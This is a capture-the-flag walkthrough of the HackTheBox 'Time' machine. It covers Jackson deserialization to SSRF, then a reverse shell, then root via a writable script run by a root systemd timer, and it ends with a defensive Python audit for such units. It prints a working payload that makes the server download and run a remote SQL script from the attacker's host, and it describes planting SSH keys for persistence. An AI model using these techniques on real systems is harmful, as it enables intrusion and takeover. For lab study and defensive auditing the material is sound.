Time — HackTheBox

y4th0ts
4 min read, Apr 3, 2021

Summary

Time is a medium-rated Linux machine created by egotisticalSW & felamos. The initial foothold is found through a JSON beautifier and validator running on port 80. Server Side Request Forgery in the validator can be abused to achieve code execution and gain user access. Root privileges are obtained by modifying a backup script that is writable by the compromised user and is run by root.

Reconnaissance

Nmap discovered ports 80 (http) and 22 (ssh) open.

Checking the HTTP service reveals a JSON Beautifier and Validator page. The Validator option is marked as still in beta, which suggests it may be vulnerable.

Entering a single character produces a long 'Validation failed' error message.

I looked up the error message on Google and the results pointed me to articles about Jackson. After further research, I learned that it is a popular Java library that maps and serializes Java objects to JSON and vice versa.

During my research, I found a GitHub repository that demonstrates how to exploit Jackson to inject SQL queries and perform code execution through Server Side Request Forgery.

Gaining User Access

The repository includes a Ruby script that automates the process, but I did it manually to better understand how the exploitation works. I created a file similar to the repository's 'inject.sql' containing a reverse shell payload. This SQL statement creates a SHELLEXEC alias and calls it at the end to execute our reverse shell.

I used the python3 HTTP server to host the inject.sql file and set up a listener for the reverse shell connection.

Now that everything is set up, exploitation can be performed. Going back to the JSON Beautifier and Validator page, I entered the following input:

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.15.135:8000/inject.sql'"}]

After the payload is processed by the validate function, the server downloads and executes the 'inject.sql' file from my HTTP server, which gives me a reverse shell as the user 'pericles'. I was able to grab the user flag after the exploitation.

Since my uid is 1000, I copied my SSH public key into pericles' authorized_keys file to get a more functional shell.

Privilege Escalation

After the initial access, I downloaded linpeas.sh onto the target machine to look for information I could use to escalate my privileges.

I found some interesting files in the output, one of them being /usr/bin/timer_backup.sh, which is writable by my user.

I also found some service configurations owned by root that appeared to reference the script.

After checking the contents of the files, I found my path to gain root privileges.

Analysis of files

● timer_backup.timer — defines a 10 second interval for the service timer_backup.service.
● timer_backup.service — restarts web_backup.service using systemctl.
● web_backup.service — executes /usr/bin/timer_backup.sh. Because the timer restarts it, the script runs every 10 seconds, and because the unit is owned by root, the script runs as root. Since I have write privileges to /usr/bin/timer_backup.sh, all I did was append a command that copies /home/pericles/.ssh/authorized_keys, which already contains my public key, to /root/.ssh/authorized_keys.

After waiting at least 10 seconds, I was able to log in to SSH as root using my private key and grab the root flag.
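A defender-side check for the misconfiguration described above, added here as an example and not part of the original write-up: it parses a systemd unit's Exec* directives and flags any program that a non-root user could modify, which is exactly the chain (root-owned unit, writable script) that gave root on this box. The unit text, the path and the 0o777 permission bits are constructed sample data; `lookup_fs` assumes a Linux host when pointed at real units.

```python
import os
import stat
from collections import namedtuple

FileInfo = namedtuple("FileInfo", "uid mode")  # owner uid and permission bits
EXEC_KEYS = ("ExecStart", "ExecStartPre", "ExecStartPost", "ExecReload", "ExecStop")

def exec_paths(unit_text):
    """Absolute program paths from Exec* lines; systemd prefix chars ('-', '@', '+', '!', ':') are stripped."""
    paths = []
    for line in unit_text.splitlines():
        key, sep, value = line.strip().partition("=")
        if sep and key.strip() in EXEC_KEYS and value.strip():
            program = value.split()[0].lstrip("-@+!:")
            if program.startswith("/"):
                paths.append(program)
    return paths

def non_root_can_write(info):
    """Root runs the unit, so any non-root write access to its program is a finding."""
    return info.uid != 0 or bool(info.mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_unit(unit_text, lookup):
    """Return [(path, reason)] for Exec* programs a non-root user could alter; lookup(path) -> FileInfo or None."""
    findings = []
    for path in exec_paths(unit_text):
        info = lookup(path)
        if info is None:
            findings.append((path, "program does not exist"))
        elif non_root_can_write(info):
            findings.append((path, "writable by non-root"))
    return findings

def lookup_fs(path):
    """Live-host lookup to pass as `lookup` when auditing real units under /etc/systemd/system."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return None
    return FileInfo(st.st_uid, stat.S_IMODE(st.st_mode))

# Constructed sample modelled on the page's web_backup.service: a root-owned unit
# whose ExecStart script is world-writable (hypothetical permission bits).
SAMPLE_UNIT = "[Unit]\nDescription=Web Backup\n\n[Service]\nType=oneshot\nExecStart=/usr/bin/timer_backup.sh\n"
SAMPLE_FS = {"/usr/bin/timer_backup.sh": FileInfo(0, 0o777)}

def demo():
    """Audit the constructed sample; returns the single expected finding."""
    return audit_unit(SAMPLE_UNIT, SAMPLE_FS.get)
```

On a real host, run `audit_unit(open(path).read(), lookup_fs)` over each unit file; an empty list means every Exec* program is root-owned and not group/world-writable.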

That’s it for Time! Thank you for reading, stay safe, and have a good day!
